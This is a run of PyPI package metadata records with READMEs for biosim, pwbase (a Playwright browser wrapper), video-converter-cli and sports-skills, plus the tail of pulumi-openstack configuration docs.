`OS_PASSWORD` environment variable is used.
- `openstack:token` - (Optional) A token is an expiring, temporary means of access issued via the Keystone service. By specifying
a token, you do not have to specify a username/password combination, since the token was already created by a username/password
out of band of the provider. If omitted, the `OS_TOKEN` or `OS_AUTH_TOKEN` environment variables are used.
- `openstack:userDomainName` - (Optional) The domain name where the user is located. If omitted, the `OS_USER_DOMAIN_NAME`
environment variable is checked.
- `openstack:userDomainId` - (Optional) The domain ID where the user is located. If omitted, the `OS_USER_DOMAIN_ID` environment
variable is checked.
- `openstack:projectDomainName` - (Optional) The domain name where the project is located. If omitted, the `OS_PROJECT_DOMAIN_NAME`
environment variable is checked.
- `openstack:projectDomainId` - (Optional) The domain ID where the project is located. If omitted, the `OS_PROJECT_DOMAIN_ID`
environment variable is checked.
- `openstack:domainId` - (Optional) The ID of the Domain to scope to (Identity v3). If omitted, the `OS_DOMAIN_ID` environment
variable is checked.
- `openstack:domainName` - (Optional) The Name of the Domain to scope to (Identity v3). If omitted, the `OS_DOMAIN_NAME` environment
variable is checked.
- `openstack:defaultDomain` - (Optional) The ID of the Domain to scope to if no other domain is specified (Identity v3). If omitted,
the environment variable `OS_DEFAULT_DOMAIN` is checked or a default value of `default` will be used.
- `openstack:insecure` - (Optional) Trust self-signed SSL certificates. If omitted, the `OS_INSECURE` environment variable is used.
- `openstack:cacertFile` - (Optional) Specify a custom CA certificate when communicating over SSL. You can specify either a path
to the file or the contents of the certificate. If omitted, the `OS_CACERT` environment variable is used.
- `openstack:cert` - (Optional) Specify client certificate file for SSL client authentication. You can specify either a path to
the file or the contents of the certificate. If omitted the `OS_CERT` environment variable is used.
- `openstack:key` - (Optional) Specify client private key file for SSL client authentication. You can specify either a path
to the file or the contents of the key. If omitted the `OS_KEY` environment variable is used.
- `openstack:endpointType` - (Optional) Specify which type of endpoint to use from the service catalog. It can be set using the
`OS_ENDPOINT_TYPE` environment variable. If not set, public endpoints is used.
- `openstack:endpointOverrides` - (Optional) A set of key/value pairs that can override an endpoint for a specified OpenStack service.
Setting an override requires you to specify the full and complete endpoint URL. This might also invalidate any region you have set,
too. Please use this at your own risk.
- `openstack:swauth` - (Optional) Set to `true` to authenticate against Swauth, a Swift-native authentication system. If omitted, the
`OS_SWAUTH` environment variable is used. You must also set `username` to the Swauth/Swift username such as `username:project`.
Set the `password` to the Swauth/Swift key. Finally, set `auth_url` as the location of the Swift service. Note that this
will only work when used with the OpenStack Object Storage resources.
- `openstack:userOctavia` - (Optional) If set to `true`, API requests will go the Load Balancer service (Octavia) instead of
the Networking service (Neutron).
- `openstack:disableNoCacheHeader` - (Optional) If set to `true`, the HTTP `Cache-Control: no-cache` header will not be added by default to all API requests.
If omitted this header is added to all API requests to force HTTP caches (if any) to go upstream instead of serving cached responses.
- `openstack:delayedAuth` - (Optional) If set to `true`, OpenStack authorization will be perfomed, when the service provider client is called.
- `openstack:allowReauth` - (Optional) If set to `true`, OpenStack authorization will be perfomed automatically, if the initial auth token get
expired. This is useful, when the token TTL is low or the overall provider execution time expected to be greater than the initial token TTL.
## Reference
For further information, please visit [the OpenStack provider docs](https://www.pulumi.com/docs/intro/cloud-providers/openstack) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/openstack).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, openstack | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-openstack"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:34:08.556501 | pulumi_openstack-5.5.0a1771568855.tar.gz | 413,476 | 72/0f/dc7fd48af986efa3b1ef2d5d6dd528b3f4b747dad1a4142abea56ecd0ace/pulumi_openstack-5.5.0a1771568855.tar.gz | source | sdist | null | false | 3adc25e372beb82f3cd61c31443c7dc0 | e3620c6fe794a4ad59eece1c3892f78978dbf7ed76c00738ca3f99714dfef2ef | 720fdc7fd48af986efa3b1ef2d5d6dd528b3f4b747dad1a4142abea56ecd0ace | null | [] | 201 |
2.4 | biosim | 0.0.2 | Core simulation library for Biosimulant | # biosim
[](https://pypi.org/project/biosim)
[](https://pypi.org/project/biosim)
Composable simulation runtime + UI layer for orchestrating runnable biomodules.
---
## Executive Summary & System Goals
### Vision
Provide a small, stable composition layer for simulations: wire reusable components ("biomodules") into a `BioWorld`, run them with a single orchestration contract, and visualize/debug runs via a lightweight web UI (SimUI). Biomodules are self-contained Python packages that can wrap external simulators internally (SBML/NeuroML/CellML/etc.) without a separate adapter layer.
### Core Mission
- Compose simulations from reusable, interoperable biomodules.
- Make "run + visualize + share a config" the default workflow (local-first; hosted later).
- Keep the runtime small and predictable while letting biomodules embed their own simulator/tooling.
### Primary Users
- Developers and researchers who need composable simulation workflows and fast iteration.
- Near-term beachhead: neuroscience demos (single neuron + small E/I microcircuits) with strong visuals and reproducible configs.
---
## Installation
Preferred (pinned GitHub ref):
```console
pip install "biosim @ git+https://github.com/<org>/biosim.git@<ref>"
```
Alternative (package index):
```console
pip install biosim
```
## Publishing to PyPI
See the release guide: [`docs/releasing.md`](docs/releasing.md).
## Examples
- See `examples/` for quick-start scripts. Try:
```bash
pip install -e .
python examples/basic_usage.py
```
For advanced curated demos (neuro/ecology), wiring configs, and model-pack templates, see the companion repo:
- https://github.com/Biosimulant/models
### Quick Start: BioWorld
Minimal usage:
```python
import biosim
from biosim import BioSignal, SignalMetadata
class Counter(biosim.BioModule):
min_dt = 0.1
def __init__(self):
self.value = 0
def reset(self) -> None:
self.value = 0
def advance_to(self, t: float) -> None:
self.value += 1
def get_outputs(self):
source = getattr(self, "_world_name", "counter")
return {
"count": BioSignal(
source=source,
name="count",
value=self.value,
time=0.0,
metadata=SignalMetadata(units="1", description="tick counter"),
)
}
world = biosim.BioWorld()
world.add_biomodule("counter", Counter())
world.run(duration=1.0, tick_dt=0.1)
```
### Visuals from Modules
Modules may optionally expose web-native visuals via `visualize()`, returning a dict or list of dicts with keys `render` and `data`. The world can collect them without any transport layer:
```python
class MyModule(biosim.BioModule):
min_dt = 0.1
def advance_to(self, t: float) -> None:
return
def get_outputs(self):
return {}
def visualize(self):
return {
"render": "timeseries",
"data": {"series": [{"name": "s", "points": [[0.0, 1.0]]}]},
}
world = biosim.BioWorld()
world.add_biomodule("module", MyModule())
world.run(duration=0.1, tick_dt=0.1)
print(world.collect_visuals()) # [{"module": "module", "visuals": [...]}]
```
See `examples/visuals_demo.py` for a minimal end-to-end example.
## SimUI (Python-Declared UI)
SimUI lets you build and launch a small web UI entirely from Python (similar to Gradio's ergonomics), backed by FastAPI and a prebuilt React SPA that renders visuals from JSON. The frontend uses Server-Sent Events (SSE) for real-time updates.
- User usage (no Node/npm required):
- Install UI extras: `pip install -e '.[ui]'`
- Try the demo: `python examples/ui_demo.py` then open `http://127.0.0.1:7860/ui/`.
- From your own code:
```python
from biosim.simui import Interface, Number, Button, EventLog, VisualsPanel
world = biosim.BioWorld()
ui = Interface(
world,
controls=[Number("duration", 10), Number("tick_dt", 0.1), Button("Run")],
outputs=[EventLog(), VisualsPanel()],
)
ui.launch()
```
- The UI provides endpoints under `/ui/api/...`:
- `GET /api/spec` – UI layout (controls, outputs, modules)
- `POST /api/run` – Start a simulation run
- `GET /api/status` – Runner status (running/paused/error)
- `GET /api/state` – Full state (status + last step + modules)
- `GET /api/events` – Buffered world events (`?since_id=&limit=`)
- `GET /api/visuals` – Collected module visuals
- `GET /api/snapshot` – Full snapshot (status + visuals + events)
- `GET /api/stream` – SSE endpoint for real-time event streaming
- `POST /api/pause` – Pause running simulation
- `POST /api/resume` – Resume paused simulation
- `POST /api/reset` – Stop, reset, and clear buffers
- **Editor sub-API** (`/api/editor/...`): visual config editor for loading, saving, validating, and applying YAML wiring configs as node graphs. Endpoints include `modules`, `current`, `config`, `apply`, `validate`, `layout`, `to-yaml`, `from-yaml`, and `files`.
Per-run resets for clean visuals
- On each `Run`, the backend clears its event buffer and calls `reset()` on modules if they implement it.
- The frontend clears visuals/events before posting `/api/run`.
- To avoid overlapping charts across runs, add `reset()` to modules that accumulate history (e.g., time series points).
- Maintainer flow (building the frontend SPA):
- Edit the React/Vite app under `src/biosim/simui/_frontend/`.
- Build via Python: `python -m biosim.simui.build` (requires Node/npm). This writes `src/biosim/simui/static/app.js`.
- Alternatively: `bash scripts/build_simui_frontend.sh`.
- Packaging includes `src/biosim/simui/static/**`, so end users never need npm.
- CI packaging (recommended): run the frontend build before `python -m build` so wheels/sdists ship the bundled assets.
Troubleshooting:
- If you see `SimUI static bundle missing at .../static/app.js`, build the frontend with `python -m biosim.simui.build` (requires Node/npm) before launching. End users installing a release wheel won't see this.
### SimUI Design Notes
- Transport: SSE (Server-Sent Events). The SPA connects to `/api/stream` for real-time updates. Polling endpoints (`/api/status`, `/api/visuals`, `/api/events`) remain available for fallback/debugging.
- Events API: `/api/events?since_id=<int>&limit=<int>` returns `{ events, next_since_id }` where `events` are appended world events and `next_since_id` is the cursor for subsequent calls.
- VisualSpec types supported now:
- `timeseries`: `data = { "series": [{ "name": str, "points": [[x, y], ...] }, ...] }`
- `bar`: `data = { "items": [{ "label": str, "value": number }, ...] }`
- `table`: `data = { "columns": [..], "rows": [[..], ...] }` or `data = { "items": [{...}, ...] }`
- `image`: `data = { "src": str, "alt"?: str, "width"?: number, "height"?: number }`
- `scatter`: scatter plot data
- `heatmap`: matrix/heatmap data
- `graph`: placeholder renderer shows counts + JSON; richer graph lib can be added later
- `custom:<type>`: custom renderer namespace for user-defined types
- unknown types: rendered as JSON fallback
- VisualSpec may also include an optional `description` (string) for hover text or captions.
## Terminology
Understanding the core concepts is essential for working with biosim effectively.
| Term | Description |
|------|-------------|
| **BioWorld** | Runtime container that orchestrates multi-rate biomodules, routes signals, and publishes lifecycle events. |
| **BioModule** | Pluggable unit of behavior with local state. Implements the runnable contract (`setup/reset/advance_to/...`). |
| **BioSignal** | Typed, versioned data payload exchanged between modules via named ports. |
| **WorldEvent** | Runtime events emitted by the BioWorld (`STARTED`, `TICK`, `FINISHED`, etc.). |
| **Wiring** | Module connection graph. Defined programmatically, via `WiringBuilder`, or loaded from YAML/TOML configs. |
| **VisualSpec** | JSON structure returned by `module.visualize()` with `render` type and `data` payload. |
### Event Lifecycle
Every simulation follows this sequence:
```
STARTED -> TICK (xN) -> FINISHED
```
`PAUSED`, `RESUMED`, `STOPPED`, and `ERROR` may also be emitted depending on runtime control flow.
## License
MIT. See `LICENSE.txt`.
| text/markdown | null | Demi <bjaiye1@gmail.com> | null | null | null | null | [
"Development Status :: 4 - Beta",
"Programming Language :: Python",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy>=1.26",
"fastapi<1,>=0.110; extra == \"all\"",
"pytest-cov>=4; extra == \"all\"",
"pytest>=7; extra == \"all\"",
"pyyaml>=6; extra == \"all\"",
"tomli>=2; python_version < \"3.11\" and extra == \"all\"",
"uvicorn>=0.23; extra == \"all\"",
"pytest-cov>=4; extra == \"dev\"",
"pytest>=7; extra == \"dev\"",
"pyyaml>=6; extra == \"dev\"",
"tomli>=2; python_version < \"3.11\" and extra == \"dev\"",
"fastapi<1,>=0.110; extra == \"ui\"",
"uvicorn>=0.23; extra == \"ui\""
] | [] | [] | [] | [
"Documentation, https://github.com/Biosimulant/biosim#readme",
"Issues, https://github.com/Biosimulant/biosim/issues",
"Source, https://github.com/Biosimulant/biosim"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:33:24.929577 | biosim-0.0.2.tar.gz | 260,489 | 50/fb/0ef7d583f9122c6945385e97bd6026acedb222836bed34e822a30a380a54/biosim-0.0.2.tar.gz | source | sdist | null | false | 011e4983bffba48f32d6dd830f68e3bb | 420203df25ccf9a2080678cf36f6dcde64860406e5016d3e726cc4148ca5e0f0 | 50fb0ef7d583f9122c6945385e97bd6026acedb222836bed34e822a30a380a54 | MIT | [
"LICENSE.txt"
] | 233 |
2.4 | pwbase | 0.1.0 | A lightweight async Playwright wrapper for Python that supports three browser launch strategies and can intercept authenticated HTTP sessions from live browser traffic. | # pwbase
A lightweight async Playwright wrapper for Python that supports three browser launch strategies and can intercept authenticated HTTP sessions from live browser traffic.
## Features
- Three browser modes: plain Playwright, stealth (bot-detection evasion), and CDP attachment
- Persistent browser state (cookies + localStorage) via `save_state` / `state_path`
- `BrowserSessionExtractor` — intercepts JSON responses and converts them into authenticated `requests.Session` objects
- Fully async, context-manager-friendly API
## Requirements
- Python 3.12+
- [uv](https://github.com/astral-sh/uv) (recommended) or pip
## Installation
```bash
uv add pwbase
# or
pip install pwbase
```
Install Playwright browsers after installing the package:
```bash
playwright install chromium
```
## Quick Start
```python
import asyncio
from pwbase import Browser, BrowserConfig, BrowserType
async def main():
async with Browser(BrowserConfig(type=BrowserType.STEALTH)) as browser:
page = await browser.get_page()
await page.goto("https://example.com")
print(await page.title())
asyncio.run(main())
```
## Browser Modes
| Mode | `BrowserType` | Description |
|---|---|---|
| Default | `DEFAULT` | Pure Playwright, no extras |
| Stealth | `STEALTH` | Applies `playwright-stealth` to reduce bot detection signals |
| CDP | `CDP` | Attaches to an existing Chrome instance via Chrome DevTools Protocol |
### Default
```python
Browser(BrowserConfig(type=BrowserType.DEFAULT))
```
### Stealth
```python
Browser(BrowserConfig(type=BrowserType.STEALTH))
```
### CDP
Start Chrome with remote debugging enabled:
```bash
google-chrome --remote-debugging-port=9222
```
Then attach:
```python
Browser(BrowserConfig(type=BrowserType.CDP, cdp_url="http://localhost:9222"))
```
> **Note:** `headless`, `state_path`, `viewport`, and related options are ignored in CDP mode. `save_state()` is not available in CDP mode.
## BrowserConfig Reference
```python
@dataclass
class BrowserConfig:
type: BrowserType = BrowserType.DEFAULT
headless: bool = True
state_path: Path | None = None # Load/save cookies + localStorage
channel: str = "chrome" # Browser channel for STEALTH mode
cdp_url: str = "http://localhost:9222"
viewport: tuple[int, int] = (1920, 1080)
user_agent: str = "..." # Windows Chrome UA by default
locale: str = "en-US"
timezone: str = "America/New_York"
args: list[str] = [ # Extra Chromium flags
"--disable-blink-features=AutomationControlled",
"--no-sandbox",
]
```
## Saving and Restoring Browser State
```python
from pathlib import Path
from pwbase import Browser, BrowserConfig, BrowserType
config = BrowserConfig(
type=BrowserType.STEALTH,
state_path=Path("state.json"),
)
# First run — log in and save session
async with Browser(config) as browser:
page = await browser.get_page()
await page.goto("https://example.com/login")
# ... perform login ...
await browser.save_state()
# Subsequent runs — state is restored automatically
async with Browser(config) as browser:
page = await browser.get_page()
await page.goto("https://example.com/dashboard")
```
## Session Extraction
`BrowserSessionExtractor` extends `Browser` and intercepts JSON responses in real time. Use it to capture authenticated sessions without manually copying cookies or headers.
```python
from pwbase import BrowserSessionExtractor, BrowserConfig, BrowserType
async with BrowserSessionExtractor(BrowserConfig(type=BrowserType.STEALTH)) as browser:
page = await browser.get_page()
await browser.start_recording(page)
await page.goto("https://example.com")
# Trigger the API call you want to capture, then:
response = browser.find_response("api/data")
if response:
session = browser.to_session(response)
r = session.get("https://example.com/api/data")
print(r.json())
```
### API
| Method | Description |
|---|---|
| `start_recording(page)` | Begin intercepting JSON responses on `page` |
| `stop_recording()` | Stop intercepting; safe to call if never started |
| `find_response(url_contains)` | Return the most recent captured response matching the substring |
| `find_all_responses(url_contains)` | Return all captured responses matching the substring |
| `wait_for_response(url_contains, timeout)` | Poll until a matching response is captured |
| `to_session(response)` | Build an authenticated `requests.Session` from a `CapturedResponse` |
### CapturedResponse Fields
```python
@dataclass
class CapturedResponse:
url: str
method: str
headers: dict[str, str] # Response headers
body: dict | list | None # Parsed JSON body
request_headers: dict[str, str] # Request headers (HTTP/2 pseudo-headers excluded from session)
request_post_data: str | None
cookies: list[Cookie]
```
## Manual Lifecycle
If you prefer not to use the context manager:
```python
browser = Browser(BrowserConfig())
await browser.start()
page = await browser.get_page()
# ... do work ...
await browser.stop()
```
## Development
```bash
# Install with dev dependencies
uv sync --group dev
# Run tests
uv run pytest
# Run tests with output
uv run pytest -v
```
### Project Structure
```
src/pwbase/
├── __init__.py # Public API surface
├── browser.py # Browser — core async Playwright wrapper
├── browser_config.py # BrowserConfig dataclass
├── browser_type.py # BrowserType enum
└── browser_session_extractor.py # BrowserSessionExtractor + CapturedResponse
tests/
├── conftest.py # Shared async mock fixtures
├── test_browser.py # Unit tests for Browser (all three modes)
└── test_browser_session_extractor.py
```
## License
MIT
| text/markdown | null | Floyd <pagarfloyd@gmail.com> | null | null | MIT License
Copyright (c) 2025 Floyd
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE. | automation, browser, cdp, http, playwright, scraping, stealth | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Internet :: WWW/HTTP :: Browsers",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.12 | [] | [] | [] | [
"playwright-stealth>=2.0.2",
"playwright>=1.58.0",
"python-dotenv>=1.2.1",
"requests>=2.32.5",
"build>=1.4.0; extra == \"dev\"",
"pytest-asyncio>=1.3.0; extra == \"dev\"",
"pytest-mock>=3.15.1; extra == \"dev\"",
"pytest>=9.0.2; extra == \"dev\"",
"twine>=6.2.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/virgotagle/pwbase",
"Repository, https://github.com/virgotagle/pwbase",
"Issues, https://github.com/virgotagle/pwbase/issues"
] | twine/6.2.0 CPython/3.12.12 | 2026-02-20T06:32:57.515470 | pwbase-0.1.0.tar.gz | 42,425 | 5c/cd/6aacf8d1cd6e5e75991571a0860ddc1724e4440e66b7f2ad3809e762a410/pwbase-0.1.0.tar.gz | source | sdist | null | false | 7c8238ea9d21d4e3b63186becb5e558c | 21dd7116b69f058040334457b0522eb32c6c00e9f957381366bbcf2a590be754 | 5ccd6aacf8d1cd6e5e75991571a0860ddc1724e4440e66b7f2ad3809e762a410 | null | [
"LICENSE"
] | 235 |
2.4 | video-converter-cli | 1.1.6 | Command-line tool to convert videos and images between formats (FFmpeg + Pillow) | # Video and Image Converter
Command-line tool to convert videos and images between formats (FFmpeg for video, Pillow for images).
**Developed by [L3CHUGU1T4](https://github.com/L3CHUGU1T4)**
---
## Install (PyPI)
Requires Python 3.8+ and [FFmpeg](https://ffmpeg.org/download.html) (for video conversion; images work without it).
```bash
pip install video-converter-cli
```
---
## Requirements
- Python 3.8+
- FFmpeg (for video conversion)
- Pillow (included via pip)
---
## Usage
Run `converter` from any directory:
```bash
converter --help
```
### Arguments and options
| Argument / Option | Description |
|-------------------|-------------|
| `files` | One or more video or image files to convert. |
| `-o`, `--output PATH` | Output file path (only when converting a single file). |
| `--quality {ultrafast,fast,medium,slow,veryslow}` | Video encoding preset (default: `medium`). |
| `--crf N` | Video quality 18–28; lower = better (default: `22`). |
### Default output
- **Videos:** `<name>.mp4` in the same directory.
- **Images:** JPEG/JPG → `<name>.png`; others → `<name>.jpg`.
### Supported formats
- **Video:** AVI, MP4, MOV, MKV, WebM, FLV, WMV, M4V
- **Image:** JPEG, PNG, BMP, TIFF, WebP, GIF
---
## Examples
```bash
converter video.avi
converter video.avi -o output.mov
converter image.jpg
converter image.png -o output.jpg
converter video.avi --quality slow --crf 18
converter file1.avi file2.jpg file3.png
```
---
## Building an executable locally (optional)
If you want a standalone executable (no pip) on your machine:
```bash
pip install -r requirements.txt
python build_exe.py
python install.py
```
Or manually:
```bash
pip install pyinstaller
pyinstaller --onefile --name converter Converter.py
```
The executable will be in `dist/converter` (or `dist/converter.exe` on Windows).
---
## Publishing to PyPI
To publish or update the package on PyPI:
```bash
pip install build twine
python -m build
twine upload dist/*.whl dist/*.tar.gz
```
(Use `build_exe.py` only for building the standalone executable; use `python -m build` for the PyPI package.)
Users can then install with: `pip install video-converter-cli` and run `converter`.
---
## License
MIT License. See [LICENSE](LICENSE).
**Developed by L3CHUGU1T4**
| text/markdown | L3CHUGU1T4 | null | null | null | MIT | video, image, converter, ffmpeg, pillow, cli | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: End Users/Desktop",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Multimedia :: Video :: Conversion",
"Topic :: Multimedia :: Graphics :: Graphics Conversion"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"Pillow>=10.0.0",
"rich>=13.0.0",
"rich-argparse>=1.6.0",
"pyinstaller>=6.0.0; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.14.0 | 2026-02-20T06:32:33.899779 | video_converter_cli-1.1.6.tar.gz | 8,054 | ef/d4/7f9dfbd9b885cfcb529b87baacd556f786c3ba6f6d0063f4ddbd49fd9514/video_converter_cli-1.1.6.tar.gz | source | sdist | null | false | c2e04a9aea7496a795b3e8e5e58b6057 | 2bd40386df177e273223009fcdce348f5ffc6544e34fea74eb61d812ece26da6 | efd47f9dfbd9b885cfcb529b87baacd556f786c3ba6f6d0063f4ddbd49fd9514 | null | [
"LICENSE"
] | 213 |
2.4 | sports-skills | 0.6.0 | Lightweight Python SDK for sports data — football, F1, NFL, NBA, WNBA, NHL, MLB, tennis, CFB, CBB, golf, prediction markets, and news | # sports-skills.sh
Open-source agent skills for live sports data and prediction markets. Built for the [Agent Skills](https://agentskills.io/specification) spec. Works with Claude Code, Cursor, Copilot, Gemini CLI, and every major AI agent.
**Zero API keys. Zero signup. Just works.**
```bash
npx skills add machina-sports/sports-skills
```
To upgrade to the latest version, run the same command with the `--yes` flag:
```bash
npx skills add machina-sports/sports-skills --yes
```
---
## What This Is
A collection of agent skills that wrap **publicly available** sports data sources and APIs. These skills don't provide proprietary data — they give AI agents a structured interface to data that's already freely accessible on the web:
- **Football**: ESPN, Understat, FPL, Transfermarkt — 21 commands across 13 leagues
- **NFL**: ESPN — scores, standings, rosters, schedules, game summaries, leaders, news
- **NBA**: ESPN — scores, standings, rosters, schedules, game summaries, leaders, news
- **WNBA**: ESPN — scores, standings, rosters, schedules, game summaries, leaders, news
- **NHL**: ESPN — scores, standings, rosters, schedules, game summaries, leaders, news
- **MLB**: ESPN — scores, standings, rosters, schedules, game summaries, leaders, news
- **Tennis**: ESPN — ATP and WTA tournament scores, rankings, calendars, player profiles, news
- **College Football (CFB)**: ESPN — scores, standings, rosters, schedules, AP/Coaches rankings, news
- **College Basketball (CBB)**: ESPN — scores, standings, rosters, schedules, AP/Coaches rankings, news
- **Golf**: ESPN — PGA Tour, LPGA, DP World Tour leaderboards, schedules, player profiles, news
- **Formula 1**: FastF1 open-source library — sessions, lap data, race results
- **Prediction Markets**: Kalshi and Polymarket public APIs — markets, prices, order books
- **Sports News**: RSS feeds and Google News — any public feed
Each skill is a SKILL.md file that any compatible AI agent can load and use immediately. Data comes from third-party public sources and is subject to their respective terms of use.
> **Personal use only.** These open-source skills rely on third-party public APIs and are intended for personal, non-commercial use. For commercial or production workloads with licensed data, SLAs, and enterprise support, see [machina.gg](https://machina.gg).
---
## Available Skills
### Sports Data
| Skill | Sport | Commands | Data Sources |
|-------|-------|----------|-------------|
| `football-data` | Football | 21 | ESPN, FPL, Understat, Transfermarkt |
| `nfl-data` | NFL | 9 | ESPN |
| `nba-data` | NBA | 9 | ESPN |
| `wnba-data` | WNBA | 9 | ESPN |
| `nhl-data` | NHL | 9 | ESPN |
| `mlb-data` | MLB | 9 | ESPN |
| `tennis-data` | Tennis (ATP + WTA) | 5 | ESPN |
| `cfb-data` | College Football (CFB) | 9 | ESPN |
| `cbb-data` | College Basketball (CBB) | 9 | ESPN |
| `golf-data` | Golf (PGA/LPGA/DP World) | 4 | ESPN |
| `fastf1` | Formula 1 | 6 | FastF1 (free library) |
| `sports-news` | Multi-sport | 2 | Any RSS feed, Google News |
### Prediction Markets
| Skill | Platform | Commands | Coverage |
|-------|----------|----------|----------|
| `kalshi` | Kalshi | 12+ | Soccer, Basketball, Baseball, Tennis, NFL, Hockey |
| `polymarket` | Polymarket | 10 | NFL, NBA, MLB, Soccer, Tennis, Cricket, MMA, Esports |
### Football Data Coverage
| Competition | League | Live Scores | Standings | Player Stats | xG | Transfers |
|------------|--------|-------------|-----------|-------------|-----|-----------|
| Premier League | England | Yes | Yes | Yes | Yes | Yes |
| La Liga | Spain | Yes | Yes | Yes | Yes | Yes |
| Bundesliga | Germany | Yes | Yes | Yes | Yes | Yes |
| Serie A | Italy | Yes | Yes | Yes | Yes | Yes |
| Ligue 1 | France | Yes | Yes | Yes | Yes | Yes |
| Champions League | Europe | Yes | Yes | Yes | - | - |
| FIFA World Cup | International | Yes | Yes | Yes | - | - |
| Championship | England | Yes | Yes | Yes | - | Yes |
| Eredivisie | Netherlands | Yes | Yes | Yes | - | Yes |
| Primeira Liga | Portugal | Yes | Yes | Yes | - | Yes |
| Serie A Brazil | Brazil | Yes | Yes | Yes | - | Yes |
| MLS | USA | Yes | Yes | Yes | - | Yes |
| European Championship | Europe | Yes | Yes | Yes | - | - |
---
## Quick Start
### Install a skill
```bash
npx skills add machina-sports/sports-skills
```
### Use with your AI agent
Once installed, your agent can call commands directly:
**Get today's matches:**
> "Show me all Premier League matches today"
**Get NFL scores:**
> "What are today's NFL scores?"
**Get NBA standings:**
> "Show me the current NBA standings"
**Get WNBA roster:**
> "Show me the Las Vegas Aces roster"
**Get NHL scores:**
> "What are today's NHL scores?"
**Get MLB scores:**
> "What are today's MLB scores?"
**Get ATP rankings:**
> "Show me the current ATP tennis rankings"
**Get college football rankings:**
> "Show me the AP Top 25 college football rankings"
**Get college basketball scores:**
> "What are today's college basketball scores?"
**Get PGA leaderboard:**
> "What's the PGA Tour leaderboard right now?"
**Check prediction market odds:**
> "What are the Polymarket odds for the Champions League final?"
**Get F1 race results:**
> "Show me the lap data from the last Monaco Grand Prix"
---
## Skills Reference
### football-data
Community football data skill. Aggregates publicly accessible web sources (ESPN, Understat, FPL, Transfermarkt). Data is sourced from these third-party sites and is subject to their respective terms of use.
**Commands:**
| Command | Description |
|---------|-------------|
| `get_competitions` | List all 12 supported competitions |
| `get_current_season` | Detect current season for a competition |
| `get_season_schedule` | All fixtures for a season |
| `get_daily_schedule` | All matches across competitions for a date |
| `get_season_standings` | League table (home/away/total) |
| `get_season_leaders` | Top scorers, assist leaders, card leaders |
| `get_season_teams` | All teams in a season |
| `search_team` | Fuzzy search for a team by name across all leagues |
| `get_team_profile` | Team info, crest, venue |
| `get_team_schedule` | Upcoming and recent matches for a team |
| `get_head_to_head` | H2H history between two teams (unavailable) |
| `get_event_summary` | Match summary with scores |
| `get_event_lineups` | Starting lineups and formations |
| `get_event_statistics` | Team-level match stats (possession, shots, passes) |
| `get_event_timeline` | Goals, cards, substitutions, VAR decisions |
| `get_event_xg` | Expected goals with shot maps |
| `get_event_players_statistics` | Individual player match stats |
| `get_missing_players` | Injured and suspended players |
| `get_player_profile` | Biography, career stats, market value |
| `get_season_transfers` | Transfer history |
| `get_competition_seasons` | Available seasons for a competition |
### nfl-data
NFL data via ESPN public endpoints. Scores, standings, rosters, schedules, game summaries, and more.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Live/recent NFL scores |
| `get_standings` | Standings by conference and division |
| `get_teams` | All 32 NFL teams |
| `get_team_roster` | Full roster for a team |
| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and scoring plays |
| `get_leaders` | Statistical leaders (passing, rushing, receiving) |
| `get_news` | NFL news articles |
| `get_schedule` | Season schedule by week |
### nba-data
NBA data via ESPN public endpoints. Scores, standings, rosters, schedules, game summaries, and more.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Live/recent NBA scores |
| `get_standings` | Standings by conference |
| `get_teams` | All 30 NBA teams |
| `get_team_roster` | Full roster for a team |
| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and scoring plays |
| `get_leaders` | Statistical leaders (points, rebounds, assists) |
| `get_news` | NBA news articles |
| `get_schedule` | Schedule for a date |
### wnba-data
WNBA data via ESPN public endpoints. Scores, standings, rosters, schedules, game summaries, and more.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Live/recent WNBA scores |
| `get_standings` | Standings by conference |
| `get_teams` | All WNBA teams |
| `get_team_roster` | Full roster for a team |
